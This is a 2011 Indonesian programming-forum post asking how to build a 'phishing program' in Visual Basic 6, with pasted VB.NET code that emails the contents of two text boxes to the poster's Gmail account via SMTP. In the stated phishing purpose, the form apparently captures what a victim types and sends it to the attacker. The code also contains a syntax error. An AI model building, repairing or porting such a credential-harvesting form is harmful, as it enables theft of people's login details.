Ceriwis  

Go Back   Ceriwis > HOBI > Komputer & Teknologi > Programming

Programming Share, tanya jawab, saling bantu antar programmer dengan berbagai macam bahasa pemrograman.

Reply
 
Thread Tools
  #1  
Old 20th November 2011
Permenkaret Permenkaret is offline
Ceriwiser
 
Join Date: Nov 2011
Posts: 351
Rep Power: 14
Permenkaret mempunyai hidup yang Normal
Default [ASK] Cara buat phising program di vb6

ane dah pernah dapet tuh gan .. tapi yg buat microsoft visual basic 2008. ni source code nya gan







Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click



Dim MyMailMessage As New MailMessage()

Try

MyMailMessage.From = New MailAddress("Your gmail account")")

MyMailMessage.To.Add("Your email account")

MyMailMessage.Subject = TextBox1.Text

MyMailMessage.Body = TextBox2.Text

Dim SMTP As New SmtpClient("smtp.gmail.com")

SMTP.Port = 587

SMTP.EnableSsl = True

SMTP.Credentials = New System.Net.NetworkCredential("Gmail account", "gmail password")

SMTP.Send(MyMailMessage)

TextBox2.Text = ""

Catch ex As Exception

End Try

End Sub

End Class







tapi kenapa yg di visual basic 6.0 gak berfungsi ya ??? mohon bantuannya gan .... jangan kasih ane ya gan .... jangan lupa komeng nya thx gan



Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


 


All times are GMT +7. The time now is 01:10 PM.


no new posts